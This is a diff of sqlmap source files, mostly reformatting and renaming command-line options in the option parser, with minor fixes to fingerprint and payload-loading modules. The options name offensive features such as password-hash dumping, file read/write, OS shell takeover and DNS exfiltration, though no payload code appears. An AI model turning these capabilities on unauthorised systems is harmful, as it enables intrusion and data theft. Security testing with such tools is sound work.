techniques.add_option("--technique", dest="tech",
|
||||||
help="SQL injection techniques to use "
|
help="SQL injection techniques to use (default \"%s\")" % defaults.tech)
|
||||||
"(default \"%s\")" % defaults.tech)
|
|
||||||
|
|
||||||
techniques.add_option("--time-sec", dest="timeSec",
|
techniques.add_option("--time-sec", dest="timeSec", type="int",
|
||||||
type="int",
|
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
|
||||||
help="Seconds to delay the DBMS response "
|
|
||||||
"(default %d)" % defaults.timeSec)
|
|
||||||
|
|
||||||
techniques.add_option("--union-cols", dest="uCols",
|
techniques.add_option("--union-cols", dest="uCols",
|
||||||
help="Range of columns to test for UNION query SQL injection")
|
help="Range of columns to test for UNION query SQL injection")
|
||||||
@@ -373,59 +333,49 @@ def cmdLineParser(argv=None):
|
|||||||
techniques.add_option("--dns-domain", dest="dnsDomain",
|
techniques.add_option("--dns-domain", dest="dnsDomain",
|
||||||
help="Domain name used for DNS exfiltration attack")
|
help="Domain name used for DNS exfiltration attack")
|
||||||
|
|
||||||
techniques.add_option("--second-order", dest="secondOrder",
|
techniques.add_option("--second-url", dest="secondUrl",
|
||||||
help="Resulting page URL searched for second-order "
|
help="Resulting page URL searched for second-order response")
|
||||||
"response")
|
|
||||||
|
techniques.add_option("--second-req", dest="secondReq",
|
||||||
|
help="Load second-order HTTP request from file")
|
||||||
|
|
||||||
# Fingerprint options
|
# Fingerprint options
|
||||||
fingerprint = OptionGroup(parser, "Fingerprint")
|
fingerprint = OptionGroup(parser, "Fingerprint")
|
||||||
|
|
||||||
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
|
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Perform an extensive DBMS version fingerprint")
|
help="Perform an extensive DBMS version fingerprint")
|
||||||
|
|
||||||
# Enumeration options
|
# Enumeration options
|
||||||
enumeration = OptionGroup(parser, "Enumeration", "These options can "
|
enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements")
|
||||||
"be used to enumerate the back-end database "
|
|
||||||
"management system information, structure "
|
|
||||||
"and data contained in the tables. Moreover "
|
|
||||||
"you can run your own SQL statements")
|
|
||||||
|
|
||||||
enumeration.add_option("-a", "--all", dest="getAll",
|
enumeration.add_option("-a", "--all", dest="getAll", action="store_true",
|
||||||
action="store_true", help="Retrieve everything")
|
help="Retrieve everything")
|
||||||
|
|
||||||
enumeration.add_option("-b", "--banner", dest="getBanner",
|
enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true",
|
||||||
action="store_true", help="Retrieve DBMS banner")
|
help="Retrieve DBMS banner")
|
||||||
|
|
||||||
enumeration.add_option("--current-user", dest="getCurrentUser",
|
enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS current user")
|
help="Retrieve DBMS current user")
|
||||||
|
|
||||||
enumeration.add_option("--current-db", dest="getCurrentDb",
|
enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS current database")
|
help="Retrieve DBMS current database")
|
||||||
|
|
||||||
enumeration.add_option("--hostname", dest="getHostname",
|
enumeration.add_option("--hostname", dest="getHostname", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS server hostname")
|
help="Retrieve DBMS server hostname")
|
||||||
|
|
||||||
enumeration.add_option("--is-dba", dest="isDba",
|
enumeration.add_option("--is-dba", dest="isDba", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Detect if the DBMS current user is DBA")
|
help="Detect if the DBMS current user is DBA")
|
||||||
|
|
||||||
enumeration.add_option("--users", dest="getUsers", action="store_true",
|
enumeration.add_option("--users", dest="getUsers", action="store_true",
|
||||||
help="Enumerate DBMS users")
|
help="Enumerate DBMS users")
|
||||||
|
|
||||||
enumeration.add_option("--passwords", dest="getPasswordHashes",
|
enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users password hashes")
|
help="Enumerate DBMS users password hashes")
|
||||||
|
|
||||||
enumeration.add_option("--privileges", dest="getPrivileges",
|
enumeration.add_option("--privileges", dest="getPrivileges", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users privileges")
|
help="Enumerate DBMS users privileges")
|
||||||
|
|
||||||
enumeration.add_option("--roles", dest="getRoles",
|
enumeration.add_option("--roles", dest="getRoles", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users roles")
|
help="Enumerate DBMS users roles")
|
||||||
|
|
||||||
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
|
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
|
||||||
@@ -453,7 +403,7 @@ def cmdLineParser(argv=None):
|
|||||||
help="Search column(s), table(s) and/or database name(s)")
|
help="Search column(s), table(s) and/or database name(s)")
|
||||||
|
|
||||||
enumeration.add_option("--comments", dest="getComments", action="store_true",
|
enumeration.add_option("--comments", dest="getComments", action="store_true",
|
||||||
help="Retrieve DBMS comments")
|
help="Check for DBMS comments during enumeration")
|
||||||
|
|
||||||
enumeration.add_option("-D", dest="db",
|
enumeration.add_option("-D", dest="db",
|
||||||
help="DBMS database to enumerate")
|
help="DBMS database to enumerate")
|
||||||
@@ -464,16 +414,14 @@ def cmdLineParser(argv=None):
|
|||||||
enumeration.add_option("-C", dest="col",
|
enumeration.add_option("-C", dest="col",
|
||||||
help="DBMS database table column(s) to enumerate")
|
help="DBMS database table column(s) to enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-X", dest="excludeCol",
|
enumeration.add_option("-X", dest="exclude",
|
||||||
help="DBMS database table column(s) to not enumerate")
|
help="DBMS database identifier(s) to not enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-U", dest="user",
|
enumeration.add_option("-U", dest="user",
|
||||||
help="DBMS user to enumerate")
|
help="DBMS user to enumerate")
|
||||||
|
|
||||||
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs",
|
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true",
|
||||||
action="store_true",
|
help="Exclude DBMS system databases when enumerating tables")
|
||||||
help="Exclude DBMS system databases when "
|
|
||||||
"enumerating tables")
|
|
||||||
|
|
||||||
enumeration.add_option("--pivot-column", dest="pivotColumn",
|
enumeration.add_option("--pivot-column", dest="pivotColumn",
|
||||||
help="Pivot column name")
|
help="Pivot column name")
|
||||||
@@ -496,28 +444,23 @@ def cmdLineParser(argv=None):
 enumeration.add_option("--sql-query", dest="query",
     help="SQL statement to be executed")

-enumeration.add_option("--sql-shell", dest="sqlShell",
-    action="store_true",
+enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true",
     help="Prompt for an interactive SQL shell")

 enumeration.add_option("--sql-file", dest="sqlFile",
     help="Execute SQL statements from given file(s)")

 # Brute force options
-brute = OptionGroup(parser, "Brute force", "These "
-    "options can be used to run brute force "
-    "checks")
+brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks")

 brute.add_option("--common-tables", dest="commonTables", action="store_true",
     help="Check existence of common tables")

 brute.add_option("--common-columns", dest="commonColumns", action="store_true",
     help="Check existence of common columns")

 # User-defined function options
-udf = OptionGroup(parser, "User-defined function injection", "These "
-    "options can be used to create custom user-defined "
-    "functions")
+udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions")

 udf.add_option("--udf-inject", dest="udfInject", action="store_true",
     help="Inject custom user-defined functions")
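
The hunks above mostly collapse multi-line add_option() calls onto single lines without changing behavior. For readers unfamiliar with optparse, which the code shown here still uses, a minimal standalone sketch of the same OptionGroup/add_option pattern follows; the parser, group and option names in it are illustrative only, not taken from the diff.

    # Minimal optparse sketch of the OptionGroup/add_option style seen above
    # (illustrative names; optparse is deprecated but still shipped with Python).
    from optparse import OptionGroup, OptionParser, SUPPRESS_HELP

    parser = OptionParser(usage="demo.py [options]")

    enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the DBMS")
    enumeration.add_option("--dbs", dest="getDbs", action="store_true",
                           help="Enumerate DBMS databases")
    enumeration.add_option("-D", dest="db",
                           help="DBMS database to enumerate")
    parser.add_option_group(enumeration)

    # Hidden option: accepted on the command line but omitted from --help output
    parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP)

    options, _ = parser.parse_args(["--dbs", "-D", "testdb"])
    print(options.getDbs, options.db)  # True testdb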
@@ -526,164 +469,131 @@ def cmdLineParser(argv=None):
     help="Local path of the shared library")

 # File system options
-filesystem = OptionGroup(parser, "File system access", "These options "
-    "can be used to access the back-end database "
-    "management system underlying file system")
+filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")

 filesystem.add_option("--file-read", dest="rFile",
-    help="Read a file from the back-end DBMS "
-        "file system")
+    help="Read a file from the back-end DBMS file system")

 filesystem.add_option("--file-write", dest="wFile",
-    help="Write a local file on the back-end "
-        "DBMS file system")
+    help="Write a local file on the back-end DBMS file system")

 filesystem.add_option("--file-dest", dest="dFile",
-    help="Back-end DBMS absolute filepath to "
-        "write to")
+    help="Back-end DBMS absolute filepath to write to")

 # Takeover options
-takeover = OptionGroup(parser, "Operating system access", "These "
-    "options can be used to access the back-end "
-    "database management system underlying "
-    "operating system")
+takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system")

 takeover.add_option("--os-cmd", dest="osCmd",
     help="Execute an operating system command")

-takeover.add_option("--os-shell", dest="osShell",
-    action="store_true",
-    help="Prompt for an interactive operating "
-        "system shell")
+takeover.add_option("--os-shell", dest="osShell", action="store_true",
+    help="Prompt for an interactive operating system shell")

-takeover.add_option("--os-pwn", dest="osPwn",
-    action="store_true",
-    help="Prompt for an OOB shell, "
-        "Meterpreter or VNC")
+takeover.add_option("--os-pwn", dest="osPwn", action="store_true",
+    help="Prompt for an OOB shell, Meterpreter or VNC")

-takeover.add_option("--os-smbrelay", dest="osSmb",
-    action="store_true",
-    help="One click prompt for an OOB shell, "
-        "Meterpreter or VNC")
+takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true",
+    help="One click prompt for an OOB shell, Meterpreter or VNC")

-takeover.add_option("--os-bof", dest="osBof",
-    action="store_true",
+takeover.add_option("--os-bof", dest="osBof", action="store_true",
     help="Stored procedure buffer overflow "
         "exploitation")

-takeover.add_option("--priv-esc", dest="privEsc",
-    action="store_true",
+takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
     help="Database process user privilege escalation")

 takeover.add_option("--msf-path", dest="msfPath",
-    help="Local path where Metasploit Framework "
-        "is installed")
+    help="Local path where Metasploit Framework is installed")

 takeover.add_option("--tmp-path", dest="tmpPath",
-    help="Remote absolute path of temporary files "
-        "directory")
+    help="Remote absolute path of temporary files directory")

 # Windows registry options
-windows = OptionGroup(parser, "Windows registry access", "These "
-    "options can be used to access the back-end "
-    "database management system Windows "
-    "registry")
+windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry")

-windows.add_option("--reg-read", dest="regRead",
-    action="store_true",
+windows.add_option("--reg-read", dest="regRead", action="store_true",
     help="Read a Windows registry key value")

-windows.add_option("--reg-add", dest="regAdd",
-    action="store_true",
+windows.add_option("--reg-add", dest="regAdd", action="store_true",
     help="Write a Windows registry key value data")

-windows.add_option("--reg-del", dest="regDel",
-    action="store_true",
+windows.add_option("--reg-del", dest="regDel", action="store_true",
     help="Delete a Windows registry key value")

 windows.add_option("--reg-key", dest="regKey",
     help="Windows registry key")

 windows.add_option("--reg-value", dest="regVal",
     help="Windows registry key value")

 windows.add_option("--reg-data", dest="regData",
     help="Windows registry key value data")

 windows.add_option("--reg-type", dest="regType",
     help="Windows registry key value type")

 # General options
-general = OptionGroup(parser, "General", "These options can be used "
-    "to set some general working parameters")
+general = OptionGroup(parser, "General", "These options can be used to set some general working parameters")

 general.add_option("-s", dest="sessionFile",
     help="Load session from a stored (.sqlite) file")

 general.add_option("-t", dest="trafficFile",
-    help="Log all HTTP traffic into a "
-        "textual file")
+    help="Log all HTTP traffic into a textual file")

-general.add_option("--batch", dest="batch",
-    action="store_true",
-    help="Never ask for user input, use the default behaviour")
+general.add_option("--batch", dest="batch", action="store_true",
+    help="Never ask for user input, use the default behavior")

 general.add_option("--binary-fields", dest="binaryFields",
     help="Result fields having binary values (e.g. \"digest\")")

-general.add_option("--charset", dest="charset",
-    help="Force character encoding used for data retrieval")
-
-general.add_option("--check-internet", dest="checkInternet",
-    action="store_true",
-    help="Check Internet connection before assessing the target")
+general.add_option("--check-internet", dest="checkInternet", action="store_true",
+    help="Check Internet connection before assessing the target")

 general.add_option("--crawl", dest="crawlDepth", type="int",
     help="Crawl the website starting from the target URL")

 general.add_option("--crawl-exclude", dest="crawlExclude",
     help="Regexp to exclude pages from crawling (e.g. \"logout\")")

 general.add_option("--csv-del", dest="csvDel",
-    help="Delimiting character used in CSV output "
-        "(default \"%s\")" % defaults.csvDel)
+    help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel)
+
+general.add_option("--charset", dest="charset",
+    help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")

 general.add_option("--dump-format", dest="dumpFormat",
     help="Format of dumped data (CSV (default), HTML or SQLITE)")

-general.add_option("--eta", dest="eta",
-    action="store_true",
-    help="Display for each output the estimated time of arrival")
+general.add_option("--encoding", dest="encoding",
+    help="Character encoding used for data retrieval (e.g. GBK)")

-general.add_option("--flush-session", dest="flushSession",
-    action="store_true",
-    help="Flush session files for current target")
+general.add_option("--eta", dest="eta", action="store_true",
+    help="Display for each output the estimated time of arrival")

-general.add_option("--forms", dest="forms",
-    action="store_true",
-    help="Parse and test forms on target URL")
+general.add_option("--flush-session", dest="flushSession", action="store_true",
+    help="Flush session files for current target")

-general.add_option("--fresh-queries", dest="freshQueries",
-    action="store_true",
-    help="Ignore query results stored in session file")
+general.add_option("--forms", dest="forms", action="store_true",
+    help="Parse and test forms on target URL")
+
+general.add_option("--fresh-queries", dest="freshQueries", action="store_true",
+    help="Ignore query results stored in session file")

 general.add_option("--har", dest="harFile",
     help="Log all HTTP traffic into a HAR file")

-general.add_option("--hex", dest="hexConvert",
-    action="store_true",
-    help="Use DBMS hex function(s) for data retrieval")
+general.add_option("--hex", dest="hexConvert", action="store_true",
+    help="Use hex conversion during data retrieval")

-general.add_option("--output-dir", dest="outputDir",
-    action="store",
+general.add_option("--output-dir", dest="outputDir", action="store",
     help="Custom output directory path")

-general.add_option("--parse-errors", dest="parseErrors",
-    action="store_true",
+general.add_option("--parse-errors", dest="parseErrors", action="store_true",
     help="Parse and display DBMS error messages from responses")

 general.add_option("--save", dest="saveConfig",
     help="Save options to a configuration INI file")

 general.add_option("--scope", dest="scope",
     help="Regexp to filter targets from provided proxy log")
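
Two related option changes sit in the hunk above: --charset is repurposed for the blind SQL injection retrieval charset, while a new --encoding option takes over forcing the character encoding used when decoding responses. As a rough illustration of the latter idea only (the helper below is made up for the example, it is not sqlmap code), a forced encoding simply wins over whatever was detected:

    # Hypothetical helper: prefer a user-forced encoding, fall back to a detected one.
    def decode_body(raw_bytes, forced_encoding=None, detected_encoding=None):
        encoding = forced_encoding or detected_encoding or "utf-8"
        return raw_bytes.decode(encoding, "replace")

    # GBK-encoded bytes decode correctly only when the encoding is forced or detected as GBK
    print(decode_body(b"\xc4\xe3\xba\xc3", forced_encoding="gbk"))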
@@ -694,77 +604,68 @@ def cmdLineParser(argv=None):
 general.add_option("--test-skip", dest="testSkip",
     help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")

-general.add_option("--update", dest="updateAll",
-    action="store_true",
+general.add_option("--update", dest="updateAll", action="store_true",
     help="Update sqlmap")

 # Miscellaneous options
 miscellaneous = OptionGroup(parser, "Miscellaneous")

 miscellaneous.add_option("-z", dest="mnemonics",
     help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")

 miscellaneous.add_option("--alert", dest="alert",
     help="Run host OS command(s) when SQL injection is found")

 miscellaneous.add_option("--answers", dest="answers",
     help="Set question answers (e.g. \"quit=N,follow=N\")")

 miscellaneous.add_option("--beep", dest="beep", action="store_true",
     help="Beep on question and/or when SQL injection is found")

-miscellaneous.add_option("--cleanup", dest="cleanup",
-    action="store_true",
-    help="Clean up the DBMS from sqlmap specific "
-        "UDF and tables")
+miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true",
+    help="Clean up the DBMS from sqlmap specific UDF and tables")

-miscellaneous.add_option("--dependencies", dest="dependencies",
-    action="store_true",
+miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true",
     help="Check for missing (non-core) sqlmap dependencies")

-miscellaneous.add_option("--disable-coloring", dest="disableColoring",
-    action="store_true",
+miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true",
     help="Disable console output coloring")

 miscellaneous.add_option("--gpage", dest="googlePage", type="int",
     help="Use Google dork results from specified page number")

-miscellaneous.add_option("--identify-waf", dest="identifyWaf",
-    action="store_true",
+miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
     help="Make a thorough testing for a WAF/IPS/IDS protection")

-miscellaneous.add_option("--mobile", dest="mobile",
-    action="store_true",
-    help="Imitate smartphone through HTTP User-Agent header")
+miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true",
+    help="Display list of available tamper scripts")

-miscellaneous.add_option("--offline", dest="offline",
-    action="store_true",
-    help="Work in offline mode (only use session data)")
+miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
+    help="Imitate smartphone through HTTP User-Agent header")

-miscellaneous.add_option("--purge-output", dest="purgeOutput",
-    action="store_true",
-    help="Safely remove all content from output directory")
+miscellaneous.add_option("--offline", dest="offline", action="store_true",
+    help="Work in offline mode (only use session data)")

-miscellaneous.add_option("--skip-waf", dest="skipWaf",
-    action="store_true",
-    help="Skip heuristic detection of WAF/IPS/IDS protection")
+miscellaneous.add_option("--purge", dest="purge", action="store_true",
+    help="Safely remove all content from sqlmap data directory")

-miscellaneous.add_option("--smart", dest="smart",
-    action="store_true",
-    help="Conduct thorough tests only if positive heuristic(s)")
+miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
+    help="Skip heuristic detection of WAF/IPS/IDS protection")
+
+miscellaneous.add_option("--smart", dest="smart", action="store_true",
+    help="Conduct thorough tests only if positive heuristic(s)")

 miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
     help="Prompt for an interactive sqlmap shell")

 miscellaneous.add_option("--tmp-dir", dest="tmpDir",
     help="Local directory for storing temporary files")

 miscellaneous.add_option("--web-root", dest="webRoot",
     help="Web server document root directory (e.g. \"/var/www\")")

-miscellaneous.add_option("--wizard", dest="wizard",
-    action="store_true",
+miscellaneous.add_option("--wizard", dest="wizard", action="store_true",
     help="Simple wizard interface for beginner users")

 # Hidden and/or experimental options
 parser.add_option("--dummy", dest="dummy", action="store_true",
@@ -782,9 +683,15 @@ def cmdLineParser(argv=None):
 parser.add_option("--profile", dest="profile", action="store_true",
     help=SUPPRESS_HELP)

+parser.add_option("--force-dbms", dest="forceDbms",
+    help=SUPPRESS_HELP)
+
 parser.add_option("--force-dns", dest="forceDns", action="store_true",
     help=SUPPRESS_HELP)

+parser.add_option("--force-pivoting", dest="forcePivoting", action="store_true",
+    help=SUPPRESS_HELP)
+
 parser.add_option("--force-threads", dest="forceThreads", action="store_true",
     help=SUPPRESS_HELP)
@@ -903,7 +810,7 @@ def cmdLineParser(argv=None):
         try:
             for arg in shlex.split(command):
                 argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
         except ValueError, ex:
-            raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
+            raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % ex.message)

     for i in xrange(len(argv)):
         if argv[i] == "-hh":

@@ -970,11 +877,9 @@ def cmdLineParser(argv=None):
     if args.dummy:
         args.url = args.url or DUMMY_URL

-    if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
-        args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
-        args.purgeOutput, args.sitemapUrl)):
-        errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
-        errMsg += "use -h for basic or -hh for advanced help\n"
+    if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers)):
+        errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). "
+        errMsg += "Use -h for basic and -hh for advanced help\n"
         parser.error(errMsg)

     return args
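
The first hunk above, like several below, replaces the Python 2-only statement form "raise SomeException, message" with the call form "raise SomeException(message)", which both Python 2 and Python 3 parsers accept. A tiny self-contained illustration (the exception class is redefined locally here just to keep the example runnable):

    # Old, Python 2-only syntax (a SyntaxError on Python 3):
    #     raise SqlmapSyntaxException, "something went wrong during command line parsing"
    # New, version-agnostic syntax:
    class SqlmapSyntaxException(Exception):
        pass

    try:
        raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % "demo")
    except SqlmapSyntaxException as ex:
        print(ex)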
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 from lib.core.common import checkFile

@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import re

@@ -44,7 +44,7 @@ class FingerprintHandler(ContentHandler):
     def startElement(self, name, attrs):
         if name == "regexp":
             self._regexp = sanitizeStr(attrs.get("value"))
-            _ = re.match("\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes
+            _ = re.match(r"\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes

             if _ and _.group(0).lower() in self._banner.lower() or not _:
                 self._match = re.search(self._regexp, self._banner, re.I | re.M)
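
The startElement() hunk above keeps an optimization worth spelling out: before running a fingerprint regexp against the banner, the handler extracts the regexp's leading literal alphanumerics and does a plain substring check first, so most patterns are rejected without a full regex search. A rough standalone sketch of that idea (function and variable names are mine, not sqlmap's):

    import re

    def banner_matches(regexp, banner):
        # Literal alphanumeric prefix of the pattern, if it has one
        prefix = re.match(r"\A[A-Za-z0-9]+", regexp)
        # Run the (comparatively expensive) regex search only when the cheap
        # substring test passes, or when no usable literal prefix exists
        if not prefix or prefix.group(0).lower() in banner.lower():
            return re.search(regexp, banner, re.I | re.M) is not None
        return False

    banner = "Server: Apache/2.4.41 (Ubuntu)"
    print(banner_matches(r"Apache[\/ ]([\d.]+)", banner))  # True
    print(banner_matches(r"nginx[\/ ]([\d.]+)", banner))   # False, regex never evaluated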
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import itertools

@@ -13,7 +13,6 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.parse.handler import FingerprintHandler
-

 def headersParser(headers):
     """
     This function calls a class that parses the input HTTP headers to

@@ -23,20 +22,17 @@ def headersParser(headers):

     if not kb.headerPaths:
         kb.headerPaths = {
-            "cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
             "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
             "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
-            "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"),
-            "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
+            "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
+            "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
             "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
             "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
         }

-    for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
+    for header in itertools.ifilter(lambda _: _ in kb.headerPaths, headers):
         value = headers[header]
         xmlfile = kb.headerPaths[header]

         handler = FingerprintHandler(value, kb.headersFp)

         parseXmlFile(xmlfile, handler)
         parseXmlFile(paths.GENERIC_XML, handler)
@@ -1,14 +1,15 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import re

 from xml.sax.handler import ContentHandler

+from lib.core.common import urldecode
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths

@@ -26,6 +27,7 @@ class HTMLHandler(ContentHandler):
         self._dbms = None
         self._page = (page or "")
         self._lower_page = self._page.lower()
+        self._urldecoded_page = urldecode(self._page)

         self.dbms = None

@@ -43,11 +45,11 @@
         elif name == "error":
             regexp = attrs.get("regexp")
             if regexp not in kb.cache.regex:
-                keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp))
+                keywords = re.findall(r"\w+", re.sub(r"\\.", " ", regexp))
                 keywords = sorted(keywords, key=len)
                 kb.cache.regex[regexp] = keywords[-1].lower()

-            if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
+            if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._urldecoded_page, re.I):
                 self.dbms = self._dbms
                 self._markAsErrorPage()
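
The HTML handler hunks above do two things: they keep a per-regexp cache of the longest literal keyword, used as a cheap pre-filter against the lowercased page, and they now run the final regex against a URL-decoded copy of the page. A simplified, self-contained sketch of that flow (helper names are illustrative, not the sqlmap API):

    import re
    try:
        from urllib.parse import unquote  # Python 3
    except ImportError:
        from urllib import unquote        # Python 2

    _keyword_cache = {}

    def error_matches(regexp, page):
        # Cache the longest literal word of the pattern as a cheap pre-filter
        if regexp not in _keyword_cache:
            keywords = re.findall(r"\w+", re.sub(r"\\.", " ", regexp))
            _keyword_cache[regexp] = sorted(keywords, key=len)[-1].lower()

        lower_page = page.lower()
        urldecoded_page = unquote(page)
        return _keyword_cache[regexp] in lower_page and re.search(regexp, urldecoded_page, re.I) is not None

    page = "Warning: You have an error in your SQL syntax near %27foo%27"
    print(error_matches(r"error in your SQL syntax", page))  # True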
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import os

@@ -36,7 +36,7 @@ def cleanupVals(text, tag):
     return text

 def parseXmlNode(node):
-    for element in node.getiterator('boundary'):
+    for element in node.getiterator("boundary"):
         boundary = AttribDict()

         for child in element.getchildren():

@@ -48,7 +48,7 @@ def parseXmlNode(node):

         conf.boundaries.append(boundary)

-    for element in node.getiterator('test'):
+    for element in node.getiterator("test"):
         test = AttribDict()

         for child in element.getchildren():

@@ -78,7 +78,7 @@ def loadBoundaries():
         errMsg = "something appears to be wrong with "
         errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
         errMsg += "sure that you haven't made any changes to it"
-        raise SqlmapInstallationException, errMsg
+        raise SqlmapInstallationException(errMsg)

     root = doc.getroot()
     parseXmlNode(root)

@@ -93,7 +93,7 @@ def loadPayloads():
         errMsg = "something appears to be wrong with "
         errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
         errMsg += "sure that you haven't made any changes to it"
-        raise SqlmapInstallationException, errMsg
+        raise SqlmapInstallationException(errMsg)

     root = doc.getroot()
     parseXmlNode(root)
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 import httplib

@@ -32,7 +32,7 @@ def parseSitemap(url, retVal=None):
         content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
     except httplib.InvalidURL:
         errMsg = "invalid URL given for sitemap ('%s')" % url
-        raise SqlmapSyntaxException, errMsg
+        raise SqlmapSyntaxException(errMsg)

     for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
         if abortedFlag:

@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """

 pass
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
